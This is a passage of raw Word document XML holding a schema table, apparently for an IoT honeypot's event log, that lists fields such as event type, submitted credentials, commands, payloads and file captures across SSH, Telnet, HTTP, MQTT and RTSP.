              <w:t xml:space="preserve">cctv / smartlock / sensor and SSH / Telnet / HTTP / MQTT / RTSP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">event_type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL, INDEX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">connect, auth, command, http_request, mqtt_publish, rtsp_request, download_attempt, exec_attempt, state_change, malformed, disconnect …</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">username, password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE (≤ 256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Credentials submitted in an auth event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BOOLEAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Whether the login was accepted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE (≤ 4000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell command, HTTP request line or RTSP request.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE (≤ 4000)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Response, body, URL or topic payload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">JSONB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NOT NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol-specific fields (user agent, topic, RTSP method, SHA-256 …).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">file_captures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
